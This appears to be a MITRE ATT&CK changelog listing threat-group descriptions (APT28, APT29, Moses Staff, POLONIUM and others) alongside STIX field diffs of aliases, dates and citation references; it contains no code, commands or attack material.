| [LazyScripter](https://attack.mitre.org/groups/G0140) is a threat group that has mainly targeted the airline industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021) |
| Description |
|---|
| [Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022) |
| Description |
|---|
| [POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
| [APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-12 19:54:58.537000+00:00 | 2022-07-26 23:33:26.354000+00:00 |
| external_references[2]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html |
| Description |
|---|
| [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'mobile-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 20:34:03.233000+00:00 | 2022-03-16 18:08:13.958000+00:00 |
| external_references[2]['source_name'] | SNAKEMACKEREL | IRON TWILIGHT |
| external_references[2]['description'] | (Citation: Accenture SNAKEMACKEREL Nov 2018) | (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) |
| external_references[3]['source_name'] | Swallowtail | SNAKEMACKEREL |
| external_references[3]['description'] | (Citation: Symantec APT28 Oct 2018) | (Citation: Accenture SNAKEMACKEREL Nov 2018) |
| external_references[4]['source_name'] | Group 74 | Swallowtail |
| external_references[4]['description'] | (Citation: Talos Seduploader Oct 2017) | (Citation: Symantec APT28 Oct 2018) |
| external_references[5]['source_name'] | Sednit | Group 74 |
| external_references[5]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) | (Citation: Talos Seduploader Oct 2017) |
| external_references[6]['source_name'] | Sofacy | Sednit |
| external_references[6]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) | This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) |
| external_references[7]['source_name'] | Pawn Storm | Sofacy |
| external_references[7]['description'] | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) |
| external_references[8]['source_name'] | Fancy Bear | Pawn Storm |
| external_references[8]['description'] | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) |
| external_references[9]['source_name'] | STRONTIUM | Fancy Bear |
| external_references[9]['description'] | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| external_references[10]['source_name'] | Tsar Team | STRONTIUM |
| external_references[10]['description'] | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
| external_references[11]['source_name'] | Threat Group-4127 | Tsar Team |
| external_references[11]['description'] | (Citation: SecureWorks TG-4127) | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) |
| external_references[12]['source_name'] | TG-4127 | Threat Group-4127 |
| external_references[13]['source_name'] | NSA/FBI Drovorub August 2020 | TG-4127 |
| external_references[13]['description'] | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. | (Citation: SecureWorks TG-4127) |
| external_references[14]['source_name'] | Cybersecurity Advisory GRU Brute Force Campaign July 2021 | NSA/FBI Drovorub August 2020 |
| external_references[14]['description'] | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. |
| external_references[14]['url'] | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF |
| external_references[15]['source_name'] | DOJ GRU Indictment Jul 2018 | Cybersecurity Advisory GRU Brute Force Campaign July 2021 |
| external_references[15]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. |
| external_references[15]['url'] | https://www.justice.gov/file/1080281/download | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF |
| external_references[16]['source_name'] | Ars Technica GRU indictment Jul 2018 | DOJ GRU Indictment Jul 2018 |
| external_references[16]['description'] | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. |
| external_references[16]['url'] | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/ | https://www.justice.gov/file/1080281/download |
| external_references[17]['source_name'] | Crowdstrike DNC June 2016 | Ars Technica GRU indictment Jul 2018 |
| external_references[17]['description'] | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018. |
| external_references[17]['url'] | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/ |
| external_references[18]['source_name'] | FireEye APT28 | Crowdstrike DNC June 2016 |
| external_references[18]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. |
| external_references[18]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ |
| external_references[19]['source_name'] | SecureWorks TG-4127 | FireEye APT28 |
| external_references[19]['description'] | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[19]['url'] | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| external_references[20]['source_name'] | FireEye APT28 January 2017 | SecureWorks TG-4127 |
| external_references[20]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016. |
| external_references[20]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign |
| external_references[21]['source_name'] | GRIZZLY STEPPE JAR | FireEye APT28 January 2017 |
| external_references[21]['description'] | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. |
| external_references[21]['url'] | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf |
| external_references[22]['source_name'] | Sofacy DealersChoice | GRIZZLY STEPPE JAR |
| external_references[22]['description'] | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. |
| external_references[22]['url'] | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/ | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf |
| external_references[23]['source_name'] | Palo Alto Sofacy 06-2018 | Sofacy DealersChoice |
| external_references[23]['description'] | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. |
| external_references[23]['url'] | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/ |
| external_references[24]['source_name'] | Symantec APT28 Oct 2018 | Palo Alto Sofacy 06-2018 |
| external_references[24]['description'] | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018. | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. |
| external_references[24]['url'] | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ |
| external_references[25]['source_name'] | ESET Zebrocy May 2019 | Symantec APT28 Oct 2018 |
| external_references[25]['description'] | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018. |
| external_references[25]['url'] | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government |
| external_references[26]['source_name'] | US District Court Indictment GRU Oct 2018 | ESET Zebrocy May 2019 |
| external_references[26]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. |
| external_references[26]['url'] | https://www.justice.gov/opa/page/file/1098481/download | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ |
| external_references[27]['source_name'] | Kaspersky Sofacy | US District Court Indictment GRU Oct 2018 |
| external_references[27]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. |
| external_references[27]['url'] | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ | https://www.justice.gov/opa/page/file/1098481/download |
| external_references[28]['source_name'] | ESET Sednit Part 3 | Kaspersky Sofacy |
| external_references[28]['description'] | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016. | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. |
| external_references[28]['url'] | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ |
| external_references[29]['source_name'] | Talos Seduploader Oct 2017 | ESET Sednit Part 3 |
| external_references[29]['description'] | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016. |
| external_references[29]['url'] | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf |
| external_references[30]['source_name'] | Securelist Sofacy Feb 2018 | Talos Seduploader Oct 2017 |
| external_references[30]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. |
| external_references[30]['url'] | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html |
| external_references[31]['source_name'] | Accenture SNAKEMACKEREL Nov 2018 | Securelist Sofacy Feb 2018 |
| external_references[31]['description'] | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. |
| external_references[31]['url'] | https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50 | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ |
| external_references[32]['source_name'] | TrendMicro Pawn Storm Dec 2020 | Secureworks IRON TWILIGHT Profile |
| external_references[32]['description'] | Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021. | Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022. |
| external_references[32]['url'] | https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html | https://www.secureworks.com/research/threat-profiles/iron-twilight |
| external_references[33]['source_name'] | Microsoft STRONTIUM Aug 2019 | Secureworks IRON TWILIGHT Active Measures March 2017 |
| external_references[33]['description'] | MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019. | Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022. |
| external_references[33]['url'] | https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ | https://www.secureworks.com/research/iron-twilight-supports-active-measures |
| external_references[34]['source_name'] | Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020 | Accenture SNAKEMACKEREL Nov 2018 |
| external_references[34]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020. | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. |
| external_references[34]['url'] | https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/ | https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50 |
| x_mitre_version | 3.2 | 4.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON TWILIGHT | |
| external_references | {'source_name': 'TrendMicro Pawn Storm Dec 2020', 'description': 'Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html'} | |
| external_references | {'source_name': 'Microsoft STRONTIUM Aug 2019', 'description': 'MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.', 'url': 'https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/'} | |
| external_references | {'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'} | |
| Description |
|---|
| [APT29](https://attack.mitre.org/groups/G0016) is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/ | |
| external_references | https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:59:58.792000+00:00 | 2022-07-11 20:34:55.717000+00:00 |
| external_references[1]['source_name'] | APT29 | CozyDuke |
| external_references[1]['description'] | (Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: Crowdstrike DNC June 2016) |
| external_references[2]['source_name'] | NobleBaron | Cozy Bear |
| external_references[2]['description'] | (Citation: SentinelOne NobleBaron June 2021) | (Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[3]['source_name'] | Dark Halo | StellarParticle |
| external_references[3]['description'] | (Citation: Volexity SolarWinds) | (Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022) |
| external_references[4]['source_name'] | StellarParticle | The Dukes |
| external_references[4]['description'] | (Citation: CrowdStrike SUNSPOT Implant January 2021) | (Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| external_references[5]['source_name'] | NOBELIUM | APT29 |
| external_references[5]['description'] | (Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021) | (Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) |
| external_references[8]['source_name'] | The Dukes | NOBELIUM |
| external_references[8]['description'] | (Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021) |
| external_references[9]['source_name'] | Cozy Bear | IRON HEMLOCK |
| external_references[9]['description'] | (Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021) | (Citation: Secureworks IRON HEMLOCK Profile) |
| external_references[10]['source_name'] | CozyDuke | IRON RITUAL |
| external_references[10]['description'] | (Citation: Crowdstrike DNC June 2016) | (Citation: Secureworks IRON RITUAL Profile) |
| external_references[11]['source_name'] | White House Imposing Costs RU Gov April 2021 | NobleBaron |
| external_references[11]['description'] | White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021. | (Citation: SentinelOne NobleBaron June 2021) |
| external_references[12]['source_name'] | UK Gov Malign RIS Activity April 2021 | Dark Halo |
| external_references[12]['description'] | UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021. | (Citation: Volexity SolarWinds) |
| external_references[13]['source_name'] | F-Secure The Dukes | Crowdstrike DNC June 2016 |
| external_references[13]['description'] | F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. |
| external_references[13]['url'] | https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ |
| external_references[14]['source_name'] | GRIZZLY STEPPE JAR | Volexity SolarWinds |
| external_references[14]['description'] | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. | Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. |
| external_references[14]['url'] | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf | https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ |
| external_references[15]['source_name'] | Crowdstrike DNC June 2016 | CrowdStrike SUNSPOT Implant January 2021 |
| external_references[15]['description'] | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. | CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021. |
| external_references[15]['url'] | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ | https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ |
| external_references[16]['source_name'] | UK Gov UK Exposes Russia SolarWinds April 2021 | CrowdStrike StellarParticle January 2022 |
| external_references[16]['description'] | UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021. | CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. |
| external_references[16]['url'] | https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise | https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ |
| external_references[17]['source_name'] | NSA Joint Advisory SVR SolarWinds April 2021 | GRIZZLY STEPPE JAR |
| external_references[17]['description'] | NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021. | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. |
| external_references[17]['url'] | https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf |
